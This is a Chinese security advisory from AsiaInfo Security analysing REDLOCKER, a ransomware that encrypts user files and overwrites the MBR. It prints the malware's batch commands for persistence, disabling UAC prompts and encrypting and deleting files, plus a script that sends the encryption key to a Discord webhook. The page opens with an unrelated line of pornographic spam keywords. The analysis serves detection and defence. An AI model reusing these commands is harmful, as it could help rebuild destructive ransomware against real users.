50岁退休熟女露脸高潮,免费观看又色又爽又黄的校园剧,乱码av麻豆丝袜熟女系列,大地影视mv高清视频在线观看 ,人摸人人人澡人人超碰手机版

?
股票代碼:688225
打開微信“掃一掃”,開啟安全數(shù)字世界之旅
截圖或長按保存至相冊,使用微信掃一掃
首頁 > 關(guān)于我們 > 企業(yè)新聞

新聞與活動

亞信安全最新資訊與活動。

【安全通告】破壞MBR!新型勒索病毒REDLOCKER來襲
發(fā)布時間 :2021年03月29日
類型 :勒索軟件
分享:

近日,亞信安全網(wǎng)絡(luò)實驗室截獲了一款破壞MBR的新型勒索病毒REDLOCKER,該病毒通過網(wǎng)絡(luò)下載感染本機(jī),到達(dá)系統(tǒng)后釋放兩個組件,其中一個組件是腳本文件,其采用RC4加密算法加密文件,并釋放MBR破壞程序,導(dǎo)致用戶系統(tǒng)重啟后顯示黑客留下的信息,無法進(jìn)入系統(tǒng)。另外一個文件為工具集,提供了RC4加密,AES加密等功能,由腳本文件進(jìn)行調(diào)用。亞信安全將該勒索命名為Ransom.Win32.REDLOCKER.YCBCQ。


https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KjuROts78a6IZ124iaXpg4SicSibn2cYricFFY8Gw30kORUWua72siar24Pg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1


攻擊流程



https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KeZvAfibH1J3F89BQwROkDJzLUbIRarSxHuoFjPZsm3m6l6qAmPl5chQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1


病毒詳細(xì)分析



母體文件分析


樣本啟動后從自身資源節(jié)中導(dǎo)出數(shù)據(jù),在%temp%目錄創(chuàng)建2個病毒組件:

https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49K4e1icicNyKVCCC3lteRBjicIAYaDzjlicsg9ricSEFgFLPPlMs1nMsftqmA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KcsiaMymbSsVjxa1hVFMBnSZBm2ibCvicycM84LZMibY4bgiccAaxkKibAFIA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KxsgmuVb1Mrd8sLbrpAx6rzwLK9XjeLMeBPAlHD4YqVUjYbgGsLzOIw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KBedfUjtZDr9Ak4sk7oalHiaHPwxQ9L3EabmMicAD4TzicsCcNaaZIqibLg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

執(zhí)行生成的批處理文件1c04.bat(該文件名為隨機(jī)命名,本文以1c04.bat為例,進(jìn)行分析):

https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KvQD05Ao3UIiclXmzxxx2kmS8LnG4VXEUAvxEd3m7PlK6mTltIuIj2iag/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

1c04.bat文件分析


  • 將病毒母體文件變?yōu)椤爸蛔x”屬性。

    Attrib +R %0

  • 將病毒母體添加到開機(jī)自啟動。

    Copy /b /y %0 “%appdata%\Microsoft\Windows\Start Menu\Programs\Startup”

  • 結(jié)束“文件資源管理器”和“系統(tǒng)服務(wù)”。

    Taskkill /im explorer.exe /f

    Taskkill /im svchost.exe /f

  • 設(shè)置注冊表自啟動項目。

    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Payload" /t REG_SZ /d "powershell.exe start -verb runas '"%0"' am_admin -WindowStyle hidden" /f>nul

  • 建立EXE文件關(guān)聯(lián),每次雙擊EXE文件時都會運(yùn)行此病毒母體文件。

    REG ADD "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d "%0 %%1 %%*" /f

  • 阻止用戶使用“我的電腦”來訪問所選驅(qū)動器的內(nèi)容。

  • 從“我的電腦”和Windows資源管理器中刪除代表所選驅(qū)動器的圖標(biāo)。此外,代表所選驅(qū)動器的驅(qū)動器號也不會出現(xiàn)在標(biāo)準(zhǔn)“打開”對話框中。

    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewonDrive" /t REG_DWORD /d 12 /f>nul

    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDrives" /t REG_DWORD /d 12 /f>nul


上述行為對應(yīng)的亞信安全沙盒檢測如下:


https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49K8icXicctVdos8I2CnfRS3icLBAcQMRQSt5qViaCP0uibialSe5KBZJxXbV3A/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KEOTGcyicykufptZaMDPboN882Q6IRF4yNSLuln8LE2VFeslSS5y8bUw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

  • 生成并打開“勒索信”。


https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KpHNdSAJX00qy2tdV9GicJ2KdibsUYVqdSa9VXoN06ILLJtAJbHJwNDgA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

  • 解密文件finalwords.exe 并設(shè)置開機(jī)啟動。

    certutil -decode finalwords.tmp finalwords.exe

    schtasks /create /SC ONEVENT /RU "SYSTEM" /EC System /TN InstantKill /TR "powershell.exe start -verb runas %cd%\finalwords.exe" /RL HIGHEST /MO *[System\EventID=6005] /F>Nul





https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49K196evamOQy09HPsPmnqAFMSaUxKlsnxx2t0ozNR6xX0Wa4QnRQj7kA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

【亞信安全沙盒檢測截圖】

  • 禁用安全桌面提示;

  • 允許執(zhí)行需要提升到管理員的操作,而無需征得同意或憑據(jù);

  • 當(dāng)程序嘗試對計算機(jī)進(jìn)行更改時,Windows 會通知用戶。

    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f

    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f

    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f

  • 設(shè)置鍵盤映射代碼屏蔽按鍵 (左右ALT鍵等)。
    REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64 > nul

  • 調(diào)用程序:extd.exe生成5個隨機(jī)字符進(jìn)行合并存入變量randomletter。


https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KzMh8ica1a5CuX9g5eDBvWCuezVYyBJ8TjPE7g71zeErg14Uu7gg1JOQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

  • 將%temp%文件夾及其子文件夾中的文件加上“只讀”、“系統(tǒng)文件”和“隱藏”屬性。

    attrib +r +s +h /S /D %temp%

  • 切換到用戶文件夾目錄,然后枚舉出此目錄及其子目錄指定后綴的文件列表,并保存到文件pathhost中。


    cd /D %HOMEDRIVE%\Users\

    dir /s /b | findstr /I /R "db exe bat doc docx xls ppx txt css html jpg eps ppt png pdf rar avi zip raw jpeg mp3 wav wma tar epub azw ibook img ani bfc blg cat cer cfg ini part prt 1 2 3 cur cpl crl crt dat db der dll dsn ds dun fnd fng fon font hlp grp isp ins inf key lnk ink msc msi msp msstyles nfo ocx otf p7c pif pm pnf psw qds rdp reg scr sct shs sys theme tmp ttc ttf wav wmdb wme wsc wsf wsh aif aifc aiff adf amf mid mi di miz mp1 mp2 mp3 mtm ogg ogm ra rmi snd stm stz vox wax wm wma wmv ace arj bz bz2 cab gz ha lha lzh r0 tbz tbz2 tgz uu uue zoo xxe bmp bw cdt cpt cgm dcx dib emf gbr gif gih ico iff ilbm jfif jif jpe lbm mac pict pct pic pcx pix pntg psd psp qtif qti rgb rgba tga tif tiff wmf dic diz dochtml hta exc log idx pdf rtf s cp wri wtx pps ppa pothtml ppthtml dot dothtml csv dqy xl asx wvx wm ctt ymg yps asp htm htt js jse jsp mht mhtml php shtm url xml xsl eml mbx msg bin class c h cpp java jar m3u vbs spl swf c++ csharp c# ppsx ps1 shb docm odt svg webp heic">pathhost


  • 將枚舉出的文件添加“只讀”、“系統(tǒng)文件”和“隱藏”屬性。
    attrib +r +s +h pathhost

  • 讀取文件列表中的每一個文件,并使用Base64加密,然后使用生成的隨機(jī)字符作為密鑰,對Base64加密后的文件使用RC4算法加密。刪除加密中間文件。
    for /f %%a in (pathhost) do (

    certutil -f -encode %%a %%a

    %extd% /aesencode %%a %%a.a %randomletter%

    %extd% /rc4 %%a %%a.aa %randomletter%

    del /f /s /q %%a

    del /f /s /q %%a.a)

  • 對所有aa后綴結(jié)尾的文件添加“只讀”屬性。
    attrib +r *.aa /S

  • 將密鑰發(fā)送到黑客服務(wù)器。
    set str=var request = new XMLHttpRequest();

    set str2=request.open("POST", "hxxps[:]//discord[.]com/api/webhooks/803443573722710047/DHTqigSoy72GqbbicAGvijeiMetfkvr8QL0UV yVIbp-4tehVd6_cnFln19Z4Ro5R76Ci");

    set str3=request.setRequestHeader('Content-type', 'application/json');

    set str4=var params = {

    set str5=username: "",

    set str6=avatar_url: "",

    set str7=content: "%randomletter%"}

    set str8=request.send(JSON.stringify(params));

    echo %str%>ThreadSender.js

    echo %str2%>>ThreadSender.js

    echo %str3%>>ThreadSender.js

    echo %str4%>>ThreadSender.js

    echo %str5%>>ThreadSender.js

    echo %str6%>>ThreadSender.js

    echo %str7%>>ThreadSender.js

    echo %str8%>>ThreadSender.js

    start ThreadSender.js



finalwords.exe文件分析

該文件運(yùn)行后嘗試鏈接如下地址下載數(shù)據(jù):
User-Agent:UFTUEDQSQYYNQUPDZWPRJLCCXDDNLLWZ
URL: hxxp://doggofallingwater[.]000webhostapp[.]com/logger.php


https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KSbmtdqjDLKXyQ8OcQa39PdM0A49BbAA3Z03UBkbRiaXRhKqVpn4FHsg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

然后主動觸發(fā)異常,迫使系統(tǒng)重啟。


https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49K3aeAVC32xIS0KtOIJRrIrWt2ksibx8icbiaTG2TiaPkBwFjOIT6rG0kUNQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

由于MBR被覆蓋,系統(tǒng)重啟后顯示黑客寫入的信息,系統(tǒng)無法正常啟動。


https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49K9CMpDQGlveXSNBu1OydmFh6icNEcoQ8Qwg5TlackotjiaO7RkNMhuMcw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

Extd.exe文件分析


該文件是一個工具集,提供許多實用功能,如:AES加密、AES解密、RC4加密、判斷系統(tǒng)版本、判斷系統(tǒng)語言、文件下載等。所有功能列表如下:


https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49K7Xk16eTx0wr441QPjGcuSKg170icVxKmzLvgybmg2ZHbyFaD9xicqwlw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

亞信安全產(chǎn)品解決方案


  • 亞信安全病毒碼版本16.609.60,云病毒碼版本16.609.71,全球碼版本16.609.00 已經(jīng)可以檢測,請用戶及時升級病毒碼版本;

  • 亞信安全DDAn沙盒平臺已經(jīng)可以檢測。

https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KOHrI3RtalaYiaUJpto0cTU9fm5owIfZa7KvcmL5dF5lCqshjHia8mHWA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

安全建議


  • 打開系統(tǒng)自動更新,并檢測更新進(jìn)行安裝;

  • 不要點(diǎn)擊來源不明的郵件以及附件;

  • 不要點(diǎn)擊來源不明的郵件中包含的鏈接;

  • 請到正規(guī)網(wǎng)站或者應(yīng)用商店下載程序;

  • 采用高強(qiáng)度的密碼,避免使用弱口令密碼,并定期更換密碼;

  • 盡量關(guān)閉不必要的端口;

  • 盡量關(guān)閉不必要的網(wǎng)絡(luò)共享;

  • 請注意備份重要文檔。備份的最佳做法是采取3-2-1規(guī)則,即至少做三個副本,用兩種不同格式保存,并將副本放在異地存儲。


IOCs:

https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49Knrlkp2v9NcFiat0We7vib3DXuu9xg9j9y7MUQFZso6ENe9GcBwLZaVHQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

上一篇:芯片巨頭曝0day漏洞可致內(nèi)存損壞,新型勒索病毒獲破壞MBR“新技能”【亞信安全網(wǎng)安周報】

下一篇:多款勒索軟件同時爆發(fā)引關(guān)注,知名挖礦病毒新變種魔掌已伸向Mac【亞信安全網(wǎng)安周報】

返回列表
分享到微信
X